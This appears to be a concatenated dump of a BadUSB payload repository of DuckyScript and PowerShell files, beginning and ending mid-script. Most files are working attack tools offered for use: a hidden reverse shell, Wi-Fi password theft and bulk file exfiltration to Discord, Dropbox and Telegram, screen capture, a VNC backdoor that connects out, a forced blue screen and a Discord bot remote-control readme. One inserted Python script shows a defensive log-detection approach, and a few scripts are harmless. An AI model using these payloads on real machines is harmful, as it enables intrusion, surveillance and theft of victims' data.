Invoke-RestMethod -Uri $dropboxUploadUrl -Method Post -Headers $headers -Body $fileBytes 29 | } 30 | catch {} 31 | } 32 | -------------------------------------------------------------------------------- /Pranks/Change Wallpaper.txt: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Change Wallpaper 3 | REM Author: @beigeworm | https://github.com/beigeworm 4 | REM Description: Uses Powershell to retrieve an image from a specified URL and sets it as the wallpaper. 5 | REM Target: Windows 10,11 6 | 7 | REM **Change INSERT_IMAGE_URL_HERE to a direct link for an image.** 8 | 9 | DEFAULT_DELAY 100 10 | 11 | REM open powershell (remove -W Hidden to show the window) 12 | GUI r 13 | DELAY 750 14 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 15 | CTRL-SHIFT ENTER 16 | DELAY 1500 17 | ALT y 18 | DELAY 5000 19 | 20 | 21 | REM powershell one-liner for changing the wallpaper 22 | STRING $url = "INSERT_IMAGE_URL_HERE";$outputPath = "$env:temp\img.jpg";$wallpaperStyle = 2;IWR -Uri $url -OutFile $outputPath 23 | STRING ;$signature = 'using System;using System.Runtime.InteropServices;public class Wallpaper {[DllImport("user32.dll", CharSet = CharSet.Auto)]public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);}' 24 | STRING ;Add-Type -TypeDefinition $signature;$SPI_SETDESKWALLPAPER = 0x0014;$SPIF_UPDATEINIFILE = 0x01;$SPIF_SENDCHANGE = 0x02;[Wallpaper]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $outputPath, $SPIF_UPDATEINIFILE -bor $SPIF_SENDCHANGE) 25 | STRING ;sleep 1;exit 26 | 27 | DELAY 500 28 | ENTER 29 | -------------------------------------------------------------------------------- /Pranks/Blank Image to Discord Spammer.txt: -------------------------------------------------------------------------------- 1 | REM Title: Blank Image to Discord Spammer 2 | REM Author: @beigeworm 3 | REM Description: Uses Powershell to send a blank image to a Discord webhook multiple 
times (to clear chat). 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove -W Hidden to show the window). 10 | GUI r 11 | DELAY 750 12 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 13 | CTRL-SHIFT ENTER 14 | DELAY 1500 15 | ALT y 16 | DELAY 5000 17 | 18 | 19 | REM Replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 20 | REM Replace 25 with the number of images to send. 21 | 22 | STRING $i = 0;$url = 'DISCORD_WEBHOOK_HERE';$n = 25 23 | 24 | 25 | REM rest of the script. 26 | STRING ;$b64 = 'iVBORw0KGgoAAAANSUhEUgAAAAQAAAUeCAYAAABZhJAkAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAACISURBVHhe7c1LDoAgDAVAjqRoIt7/ 27 | STRING YMjPwNaVm1k0pdPXEPYj5bUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD4Bld5zApxbN7eE3FJ7GfKW92W3hItGvtQezm5yzCrfdtORh+JCktiLQDAr5DyA9jL3oe8Lgu3AAAAAElFTkSuQmCC' 28 | STRING ;$decoded = [System.Convert]::FromBase64String($b64);$File = "$env:temp\bl.png";Set-Content -Path $File -Value $decoded -Encoding Byte;while($i -lt $n){curl.exe -F "file1=@$file" $url;$i++};Remove-Item -Path $file;exit -------------------------------------------------------------------------------- /OSINT/Record-Screen-to-Discord.txt.txt: -------------------------------------------------------------------------------- 1 | REM Title: Record Screen To Discord 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: record a 30 second mkv file of the screen and send to discord. 4 | REM Target: Windows 10 5 | 6 | REM SETUP 7 | REM replace YOUR_WEBHOOK_HERE (below) with your discord webhook. 8 | 9 | REM some setup for dukie script. 10 | DEFAULT_DELAY 100 11 | 12 | GUI r 13 | DELAY 750 14 | 15 | REM open powershell (add "-W Hidden" to hide the window). 
16 | STRING powershell -NoP -NonI -Exec Bypass 17 | ENTER 18 | DELAY 5000 19 | 20 | STRING $hookurl = 'YOUR_WEBHOOK_HERE';Function RecordScreen{param ([int[]]$t);$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":arrows_counterclockwise: ``Recording screen for $t seconds..`` :arrows_counterclockwise:"} | ConvertTo-Json ;Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys;$Path = "$env:Temp\ffmpeg.exe";If (!(Test-Path $Path)){$url = "https://cdn.discordapp.com/attachments/803285521908236328/1089995848223555764/ffmpeg.exe";iwr -Uri $url -OutFile $Path};sleep 1;$mkvPath = "$env:Temp\ScreenClip.mkv";if ($t.Length -eq 0){$t = 10};.$env:Temp\ffmpeg.exe -f gdigrab -t 10 -framerate 30 -i desktop $mkvPath;curl.exe -F file1=@"$mkvPath" $hookurl | Out-Null;sleep 1;rm -Path $mp3Path -Force}RecordScreen -t 30;exit 21 | ENTER -------------------------------------------------------------------------------- /Uvnc-Remote-Desktop/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | <# ======================== Start Uvnc client (Remote Desktop) ========================== 3 | 4 | DOWNLOAD SERVER FILES - https://github.com/beigeworm/assets/raw/main/uvnc-server.zip 5 | 6 | SYNOPSIS 7 | Downloads Uvnc client to machine and runs winvnc.exe 8 | Veiwable from another machine with vncviewer.exe 9 | 10 | USAGE 11 | 4. On host machine unzip 'uvnc-server.zip' 12 | 5. In extracted folder right click then click 'open in terminal' 13 | 1. Run this command with your port specified on your host machine - ./vncviewer.exe -listen 8080 14 | 2. Add your IP and PORT below 15 | 3. 
Run this script on a target machine 16 | 17 | #> 18 | 19 | $ip = "$ip" 20 | $port = '8080' 21 | 22 | $tempFolder = "$env:temp\vnc" 23 | $vncDownload = "https://github.com/beigew0rm/assets/raw/main/winvnc.zip" 24 | $vncZip = "$tempFolder\winvnc.zip" 25 | 26 | if (!(Test-Path -Path $tempFolder)) { 27 | New-Item -ItemType Directory -Path $tempFolder | Out-Null 28 | } 29 | 30 | if (!(Test-Path -Path $vncZip)) { 31 | Invoke-WebRequest -Uri $vncDownload -OutFile $vncZip 32 | } 33 | sleep 1 34 | Expand-Archive -Path $vncZip -DestinationPath $tempFolder -Force 35 | sleep 1 36 | rm -Path $vncZip -Force 37 | 38 | $proc = "$tempFolder\winvnc.exe" 39 | Start-Process $proc -ArgumentList ("-run") 40 | sleep 2 41 | Start-Process $proc -ArgumentList ("-connect $ip::$port") 42 | -------------------------------------------------------------------------------- /Reverse Shells and C2/Simple NetCat Client.txt: -------------------------------------------------------------------------------- 1 | REM Title: Simple NetCat Client 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to start a Netcat client that stays open until the system is restarted. 4 | REM Target: Windows 10 5 | 6 | REM *REQUIREMENTS* 7 | REM start a netcat listener on server machine using port 4444 (example command for netcat > nc.exe -lvp 4444). 8 | 9 | REM *SETUP* 10 | NETCAT FOR WINDOWS - https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip 11 | REM replace YOUR_IP_OR_DOMAIN_HERE with ncat server address and PORT_NUMBER. 12 | 13 | REM some setup for dukie script. 14 | DEFAULT_DELAY 100 15 | 16 | REM open powershell (remove -W Hidden to show the window). 17 | GUI r 18 | DELAY 750 19 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 20 | CTRL-SHIFT ENTER 21 | DELAY 1500 22 | ALT y 23 | DELAY 5000 24 | 25 | REM write out the main Powershell code. 
26 | STRING do{;$v = 4;$a = New-Object SyStem.NeT.sockeTs.TCPClieNt("YOUR_IP_OR_DOMAIN_HERE",PORT_NUMBER) 27 | STRING ;$b = $a.GetStream();[byte[]]$c = 0..65535|%{0};while(($d = $b.Read($c, 0, $c.Length)) -ne 0){;$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d) 28 | STRING ;$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ';$h = ([text.encoding]::ASCII).GetBytes($g);$b.Write($h,0,$h.Length);$b.Flush()};$a.Close();Sleep 10}while ($v -le 5) 29 | ENTER 30 | -------------------------------------------------------------------------------- /Wifi-Networks-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $whuri = "$dc" 2 | # shortened URL Detection 3 | if ($whuri.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $whuri = (irm $whuri).url} 4 | 5 | $outfile="" 6 | $a=0 7 | $ws=(netsh wlan show profiles) -replace ".*:\s+" 8 | foreach($s in $ws){ 9 | if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ 10 | $ssid=$s.Trim() 11 | if($s -Match ":"){ 12 | $ssid=$s.Split(":")[1].Trim() 13 | } 14 | $pw=(netsh wlan show profiles name=$ssid key=clear) 15 | $pass="None" 16 | foreach($p in $pw){ 17 | if($p -Match "Key Content"){ 18 | $pass=$p.Split(":")[1].Trim() 19 | $outfile+="SSID: $ssid : Password: $pass`n" 20 | } 21 | } 22 | } 23 | $a++ 24 | } 25 | 26 | $outfile | Out-File -FilePath "$env:temp\info.txt" -Encoding ASCII -Append 27 | 28 | $Pathsys = "$env:temp\info.txt" 29 | $msgsys = Get-Content -Path $Pathsys -Raw 30 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 31 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 32 | Start-Sleep 1 33 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 34 | Remove-Item -Path $Pathsys -force 35 | 
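Added detection example, not code from this repository: the payloads above are typed into a console opened with abbreviated switches (-NoP -NonI -W Hidden -Exec Bypass, -Ep Bypass), so process-creation logs show only the launcher, while the script body shows up in PowerShell script block logs when that logging is enabled. The Python below normalises the abbreviated switches and matches script text against strings taken from these files; the event layout, rule names and sample records are constructed for illustration.

```python
import re

# powershell.exe accepts shortened parameter names, so "-NoP", "-Exec" and
# "-Ep" must be normalised before matching.
# (full name, shortest accepted prefix, extra aliases)
PS_PARAMS = [
    ("executionpolicy", "ex", {"ep"}),
    ("encodedcommand", "e", {"ec"}),
    ("windowstyle", "w", set()),
    ("noprofile", "nop", set()),
    ("noninteractive", "noni", set()),
    ("command", "c", set()),
]
TAKES_VALUE = ("executionpolicy", "windowstyle")
TAKES_REST = ("command", "encodedcommand")

# Rules for script text (hypothetical names); every string matched here
# appears in the files above. Matching is case-insensitive because the
# payloads mix case, e.g. "SyStem.NeT.sockeTs.TCPClieNt".
SCRIPT_RULES = {
    "download-and-execute": re.compile(
        r"(?i)\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b[^|;]*\|\s*(iex|invoke-expression)\b"),
    "wifi-key-dump": re.compile(r"(?i)netsh\s+wlan\s+show\s+profiles?\b.*key\s*=\s*clear"),
    "curl-file-upload": re.compile(r'(?i)\bcurl(\.exe)?\s.*-F\s+"?\w+=@'),
    "telegram-bot-api": re.compile(r"(?i)api\.telegram\.org/bot"),
    "dropbox-upload-api": re.compile(r"(?i)content\.dropboxapi\.com/2/files/upload"),
    "tcp-shell-loop": re.compile(
        r"(?is)(?=.*system\.net\.sockets\.tcpclient)(?=.*\b(iex|invoke-expression)\b)"),
}


def resolve_param(flag):
    """Map an abbreviated switch such as -NoP or -Ep to its full name."""
    flag = flag.lstrip("-/").lower()
    for name, shortest, aliases in PS_PARAMS:
        if flag in aliases or (name.startswith(flag) and len(flag) >= len(shortest)):
            return name
    return None


def parse_launcher(cmdline):
    """Return the normalised switches of a PowerShell command line, or None
    if the process is not PowerShell. Assumes no spaces in the image path."""
    tokens = cmdline.split()
    if not tokens or not re.search(r"(?i)(^|\\)(powershell|pwsh)(\.exe)?$", tokens[0].strip('"')):
        return None
    found, i = {}, 1
    while i < len(tokens):
        name = resolve_param(tokens[i]) if tokens[i].startswith("-") else None
        if name in TAKES_REST:
            found[name] = " ".join(tokens[i + 1:])
            break
        if name in TAKES_VALUE and i + 1 < len(tokens):
            found[name] = tokens[i + 1].lower()
            i += 1
        elif name:
            found[name] = True
        i += 1
    return found


def scan(event):
    """Return the rule names hit by one constructed log record."""
    hits, text = [], event["text"]
    if event["kind"] == "process":
        flags = parse_launcher(text)
        if flags is None:
            return hits
        bypass = flags.get("executionpolicy") == "bypass"
        hidden = str(flags.get("windowstyle", "")).startswith("h")
        if bypass:
            hits.append("hidden-bypass-launcher" if hidden else "bypass-launcher")
        text = flags.get("command", "")  # inline -Command text, if any
    hits += [name for name, rx in SCRIPT_RULES.items() if rx.search(text)]
    return hits


# Constructed sample records: "process" = process-creation command line,
# "scriptblock" = text from a PowerShell script block log entry.
SAMPLE_EVENTS = [
    {"kind": "process", "text": r"powershell -NoP -NonI -W Hidden -Exec Bypass"},
    {"kind": "process", "text": r"powershell -Exec Bypass -C irm https://example.invalid/main.ps1 | iex"},
    {"kind": "process", "text": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ep Bypass -File C:\Scripts\backup.ps1"},
    {"kind": "process", "text": r"notepad.exe C:\notes.txt"},
    {"kind": "scriptblock", "text": r"$pw=(netsh wlan show profiles name=$ssid key=clear)"},
    {"kind": "scriptblock", "text": r'curl.exe -F chat_id="$ChatID" -F document=@"$filePath" "https://api.telegram.org/bot$Token/sendDocument"'},
    {"kind": "scriptblock", "text": r'$a = New-Object SyStem.NeT.sockeTs.TCPClieNt("host.invalid",4444);$f = (iex $e 2>&1 | Out-String)'},
    {"kind": "scriptblock", "text": r"Get-ChildItem C:\Logs | Measure-Object"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(scan(ev), "<-", ev["text"][:70])
```

-Exec Bypass on its own is common in legitimate administration, so the bypass-launcher hit is best treated as a weak signal that gains weight when paired with a hidden window or a script-body hit.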
-------------------------------------------------------------------------------- /Pranks/Mario-BSOD.txt: -------------------------------------------------------------------------------- 1 | REM Title: Invoke BSOD 2 | REM Author: @beigeworm 3 | REM Description: This will open powershell and cause a blue screen. 4 | REM Target: Windows 10 / 11 5 | REM CREDIT: All credit to FalsePhilosipher for the code! https://github.com/FalsePhilosopher 6 | 7 | 8 | REM some setup for dukie script. 9 | DEFAULT_DELAY 100 10 | 11 | REM open powershell 12 | GUI r 13 | DELAY 750 14 | STRING powershell -NoP -NonI -Exec Bypass 15 | ENTER 16 | DELAY 4000 17 | STRING $video = "$env:TMP/mario.wmv";iwr "https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Misc/Win/BSOD/mario-head/mario.wmv" -OutFile $video; & $video;sleep 1;$wshell = New-Object -ComObject wscript.shell;$wshell.SendKeys("{F11}");sleep 5;$source = 'using System; using System.Runtime.InteropServices; public static class CS{[DllImport("ntdll.dll")] public static extern uint RtlAdjustPrivilege(int Privilege, bool bEnablePrivilege, bool IsThreadPrivilege, out bool PreviousValue);[DllImport("ntdll.dll")] public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ValidResponseOption, out uint Response); public static unsafe void Kill(){Boolean tmp1;uint tmp2;RtlAdjustPrivilege(19, true, false, out tmp1);NtRaiseHardError(0xc0000022, 0, 0, IntPtr.Zero, 6, out tmp2);}}';$comparams = new-object -typename system.CodeDom.Compiler.CompilerParameters;$comparams.CompilerOptions = '/unsafe';$a = Add-Type -TypeDefinition $source -Language CSharp -PassThru -CompilerParameters $comparams;[CS]::Kill() 18 | ENTER 19 | -------------------------------------------------------------------------------- /Discord-Media-Hog/readme.md: -------------------------------------------------------------------------------- 1 | **SYNOPSIS** 2 | 3 | Uses a Discord bot to 
send system information, stream desktop and webcam screenshots 4 | Also opens a powershell command line interface through discord. 5 | 6 | ![scampwn](https://github.com/beigeworm/BadUSB-Files-For-FlipperZero/assets/93350544/ffcc08a2-42d6-4ccd-8b3c-9534bea74174) 7 | 8 | **SETUP** 9 | 10 | -SETUP THE BOT 11 | 1. make a discord bot at https://discord.com/developers/applications/ 12 | 2. Enable all Privileged Gateway Intents on 'Bot' page 13 | 3. On OAuth2 page, tick 'Bot' in Scopes section 14 | 4. In Bot Permissions section tick Manage Channels, Read Messages/View Channels, Attach Files, Read Message History. 15 | 5. Copy the URL into a browser and add the bot to your server. 16 | 6. On 'Bot' page click 'Reset Token' and copy the token. 17 | 18 | -SETUP THE SCRIPT 19 | 20 | ----- Option 1 ----- (token placed in ps1 file) 21 | 1. Copy the token into the Bad USB txt file directly 22 | 23 | ----- Option 2 ----- (token hosted online) 24 | 1. Create a file on Pastebin or Github with the content below - Supply your token and optional webhooks (include braces) 25 | { 26 | "tk": "TOKEN_HERE", 27 | "scrwh": "WEBHOOK_HERE", 28 | "camwh": "WEBHOOK_HERE", 29 | "micwh": "WEBHOOK_HERE" 30 | } 31 | 2. Copy the RAW file url into the Bad USB txt file like this.. 
$uri = 'https://pastebin.com/raw/xxxxxxxx'


**INFORMATION**

- The Discord bot you use must be in one server only
- You can specify webhooks to send duplicate files to other channels on another server (OPTIONAL)

--------------------------------------------------------------------------------
/GIF-Player/main.ps1:
--------------------------------------------------------------------------------
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
[System.Windows.Forms.Application]::EnableVisualStyles()

$url = "https://media3.giphy.com/media/tJqyalvo9ahykfykAj/giphy.gif?ep=v1_gifs_search" # example GIF (replace with your own link)
$gifPath = "$env:temp/g.gif"
iwr -Uri $url -OutFile $gifPath
$ErrorActionPreference = 'Stop'

function Play-Gif {
    param(
        [string]$GifPath
    )

    $form = New-Object System.Windows.Forms.Form
    $pictureBox = New-Object System.Windows.Forms.PictureBox
    $timer = New-Object System.Windows.Forms.Timer

    $form.Text = "GIF Player"
    $form.Size = New-Object System.Drawing.Size(490, 300)
    $form.StartPosition = 'CenterScreen'
    $form.Topmost = $true

    $pictureBox.Size = $form.Size
    $pictureBox.Image = [System.Drawing.Image]::FromFile($GifPath)

    $timer.Interval = 50 # Adjust the interval as needed for desired animation speed
    $timer.Add_Tick({
        # Advance to the next frame; $timer.Tag holds the current frame index
        $pictureBox.Image.SelectActiveFrame([System.Drawing.Imaging.FrameDimension]::Time, $timer.Tag)
        $pictureBox.Refresh()
        $timer.Tag = ($timer.Tag + 1) % $pictureBox.Image.GetFrameCount([System.Drawing.Imaging.FrameDimension]::Time)
    })

    $timer.Tag = 0

    $form.Controls.Add($pictureBox)

    $form.Add_Shown({ $timer.Start() })

    $form.ShowDialog() | Out-Null

    # Image.FromFile keeps the file locked until the image is disposed,
    # so release it here or the Remove-Item below fails.
    $timer.Stop()
    $pictureBox.Image.Dispose()
    $form.Dispose()
}

Play-Gif -GifPath $gifPath
sleep 1
Remove-Item $gifPath

-------------------------------------------------------------------------------- /File-Monitor-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $whuri = "$dc" 2 | # shortened URL Detection 3 | if ($whuri.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $whuri = (irm $whuri).url} 4 | 5 | $watcher = New-Object System.IO.FileSystemWatcher -Property @{ 6 | Path = $env:USERPROFILE + '\' 7 | } 8 | $watcher.NotifyFilter = [System.IO.NotifyFilters]::FileName -bor ` 9 | [System.IO.NotifyFilters]::LastWrite -bor ` 10 | [System.IO.NotifyFilters]::DirectoryName 11 | 12 | $action = { 13 | $event = $EventArgs 14 | $path = $event.FullPath 15 | $changeType = $event.ChangeType 16 | $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss" 17 | 18 | $msgsys = "[$timestamp] File $changeType > $path" 19 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 20 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 21 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 22 | 23 | } 24 | 25 | Register-ObjectEvent -InputObject $watcher -EventName Created -Action $action 26 | Register-ObjectEvent -InputObject $watcher -EventName Deleted -Action $action 27 | Register-ObjectEvent -InputObject $watcher -EventName Changed -Action $action 28 | 29 | $watcher.EnableRaisingEvents = $true 30 | 31 | while ($true) { 32 | Start-Sleep -Milliseconds 500 33 | } 34 | 35 | Unregister-Event -InputObject $watcher -EventName Created -Action $action 36 | Unregister-Event -InputObject $watcher -EventName Deleted -Action $action 37 | Unregister-Event -InputObject $watcher -EventName Changed -Action $action 38 | -------------------------------------------------------------------------------- /OSINT/Installed Programs and Eventlogs to File.txt: -------------------------------------------------------------------------------- 
1 | REM Title: Programs and Eventlogs to File 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to gather a list of installed programs and Windows Eventlogs and saves the info to a file. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script. 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove -W Hidden to show the window). 10 | GUI r 11 | DELAY 750 12 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 13 | CTRL-SHIFT ENTER 14 | DELAY 1500 15 | ALT y 16 | DELAY 5000 17 | 18 | REM the main powershell script. 19 | STRING $date = Get-Date -Format "yyyy-MM-dd-hh-mm-ss";$outputPath = "$env:temp\Osint-$date.txt";New-Item -ItemType File -Path $outputPath 20 | STRING ;$installed = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version, Vendor;$hotfixes = Get-WmiObject -Class Win32_QuickFixEngineering | Select-Object -Property HotFixID, Description, InstalledOn 21 | STRING ;$removed = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object -Property DisplayName, DisplayVersion, Publisher, InstallDate | Where-Object {$_.DisplayName -ne $null} 22 | STRING ;$installed | Format-Table -AutoSize | Out-File -FilePath $outputPath ;$hotfixes | Format-Table -AutoSize | Out-File -FilePath $outputPath -Append 23 | STRING ;$removed | Format-Table -AutoSize | Out-File -FilePath $outputPath -Append;$userActivity = Get-EventLog -LogName Security -EntryType SuccessAudit | Where-Object {$_.EventID -eq 4624 -or $_.EventID -eq 4634} 24 | STRING ;$userActivity | Out-File -FilePath $outputPath -Append;$hardwareInfo = Get-EventLog -LogName System | Where-Object {$_.EventID -eq 12 -or $_.EventID -eq 13};$hardwareInfo | Out-File -FilePath $outputPath -Append 25 | STRING ;sleep 30;exit 26 | ENTER 27 | -------------------------------------------------------------------------------- /Voice-Activated-DarkMode/main.ps1: 
--------------------------------------------------------------------------------
<# ===================== VOICE ACTIVATED DARK/LIGHT MODE ======================

SYNOPSIS
Control Windows theme with your voice.
Say 'Light' OR 'Dark' to change theme.

#>

$Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'
$Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru
$hwnd = (Get-Process -PID $pid).MainWindowHandle
if($hwnd -ne [System.IntPtr]::Zero){
    $Type::ShowWindowAsync($hwnd, 0)
}
else{
    $Host.UI.RawUI.WindowTitle = 'hideme'
    $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' })
    $hwnd = $Proc.MainWindowHandle
    $Type::ShowWindowAsync($hwnd, 0)
}

while ($true) {
    Add-Type -AssemblyName System.Speech
    $speech = New-Object System.Speech.Recognition.SpeechRecognitionEngine
    $grammar = New-Object System.Speech.Recognition.DictationGrammar
    $speech.LoadGrammar($grammar)
    $speech.SetInputToDefaultAudioDevice()
    $result = $speech.Recognize()
    $Theme = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize"
    if ($result) {
        $text = $result.Text
        Write-Output $text

        if ($text -match 'Dark'){
            Write-Host "Set Dark Theme"
            Set-ItemProperty $Theme AppsUseLightTheme -Value 0
            Set-ItemProperty $Theme SystemUsesLightTheme -Value 0
        }
        if ($text -match 'Light'){
            Set-ItemProperty $Theme AppsUseLightTheme -Value 1
            Set-ItemProperty $Theme SystemUsesLightTheme -Value 1
            Write-Host "Set Light Theme"
        }
    }
}
--------------------------------------------------------------------------------
/OSINT/Exfiltrate files to DropBox.txt:
--------------------------------------------------------------------------------
REM Title: Exfiltrate Files To DropBox
REM Author:
@beigeworm 3 | REM Description: Uses Powershell to Exfiltrate all files of all specified filetypes to a DropBox account. 4 | REM Target: Windows 10,11 5 | 6 | REM SETUP 7 | REM make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app) 8 | REM generate an access token for your app and replace DROPBOX_ACCESS_TOKEN_HERE. 9 | 10 | REM Setup for duckyscript 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove -W Hidden to show the window) 14 | GUI r 15 | DELAY 750 16 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 17 | CTRL-SHIFT ENTER 18 | DELAY 1500 19 | ALT y 20 | 21 | STRING $accessToken = "DROPBOX_ACCESS_TOKEN_HERE" 22 | STRING ;$localFolderPath = "$env:USERPROFILE"; $computerName = "$env:COMPUTERNAME"; $dropboxCreateFolderUrl = "https://api.dropboxapi.com/2/files/create_folder_v2" 23 | STRING ;$dropboxFolderPath = $computerName.ToString(); $dropboxUploadUrl = "https://content.dropboxapi.com/2/files/upload" 24 | ENTER 25 | STRING $headers = @{"Authorization" = "Bearer $accessToken" 26 | ENTER 27 | STRING "Content-Type" = "application/octet-stream"} 28 | ENTER 29 | STRING $body = @{"path" = "/$computerName" 30 | ENTER 31 | STRING "autorename" = $true}| ConvertTo-Json; $files = Get-ChildItem -Path $localFolderPath -Include "*.docx","*.txt","*.pdf","*.jpg","*.png" -Recurse 32 | ENTER 33 | STRING foreach($file in $files){$relativePath = $file.FullName.Replace($localFolderPath, '').TrimStart('\') 34 | STRING ;$dropboxFilePath = "$dropboxFolderPath/$relativePath".Replace('\', '/') 35 | STRING ;$headers["Dropbox-API-Arg"] = "{`"path`": `"/$dropboxFilePath`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}" 36 | STRING ;try{$fileBytes = [System.IO.File]::ReadAllBytes($file.FullName) 37 | STRING ;$response = Invoke-RestMethod -Uri $dropboxUploadUrl -Method Post -Headers $headers -Body $fileBytes}catch{}} 38 | ENTER 39 | -------------------------------------------------------------------------------- 
/OSINT/Screenshot to Telegram.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Desktop Screenshot to Telegram. 2 | REM Author: @beigeworm 3 | REM Description: Using a Telegram Bot's Chat to receive a screenshot of the desktop. 4 | REM Target: Windows 10 and 11 5 | 6 | REM SETUP INSTRUCTIONS 7 | REM 1. Install Telegram and make an account if you haven't already. 8 | REM 2. Visit https://t.me/botfather and make a bot. (make a note of the API token) 9 | REM 3. Click the provided link to open the chat E.G. "t.me/****bot" then type or click /start) 10 | REM 4. Run the script on target system 11 | REM 5. Check telegram chat for 'waiting to connect' message. 12 | REM 6. This script has a feature to wait until you start the session from Telegram. 13 | REM 7. Type the computer name from the 'waiting' message into Telegram bot chat to connect to that computer. 14 | REM 8. Replace TELEGRAM_BOT_API_TOKEN_HERE Below with your Telegram Bot API Token 15 | 16 | REM some setup for dukie script 17 | DEFAULT_DELAY 100 18 | 19 | GUI r 20 | DELAY 750 21 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 22 | ENTER 23 | DELAY 4000 24 | STRING $Token = "TELEGRAM_TOKEN_HERE";$URL='https://api.telegram.org/bot{0}' -f $Token;while($chatID.length -eq 0){$updates = Invoke-RestMethod -Uri ($url + "/getUpdates");if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1];if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}};Sleep 10}Add-Type -AssemblyName System.Windows.Forms;$screen = [System.Windows.Forms.SystemInformation]::VirtualScreen;$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height;$graphics = [System.Drawing.Graphics]::FromImage($bitmap);$graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $screen.Size);$filePath = "$env:temp\sc.png";$bitmap.Save($filePath, [System.Drawing.Imaging.ImageFormat]::Png);$graphics.Dispose();$bitmap.Dispose();curl.exe -F chat_id="$ChatID" -F 
document=@"$filePath" "https://api.telegram.org/bot$Token/sendDocument";rm -Path $filePath;exit 25 | DELAY 500 26 | ENTER 27 | -------------------------------------------------------------------------------- /OSINT/Exfiltrate files to Discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Exfiltrate files to Discord. 2 | REM Author: @beigeworm 3 | REM Description: Using a Discord webhook to receive all matching files in bulk zips of 25mb each. (searches user folders for pictures, video, text files etc..) 4 | REM Target: Windows 10 and 11 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | GUI r 10 | DELAY 750 11 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 12 | ENTER 13 | DELAY 4000 14 | STRING $hookurl = "WEBHOOK_HERE";Function Exfiltrate {$maxZipFileSize = 24MB;$currentZipSize = 0;$index = 1;$zipFilePath ="$env:temp/Loot$index.zip";$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos");$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft");Add-Type -AssemblyName System.IO.Compression.FileSystem;$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create');foreach ($folder in $foldersToSearch) {foreach ($extension in 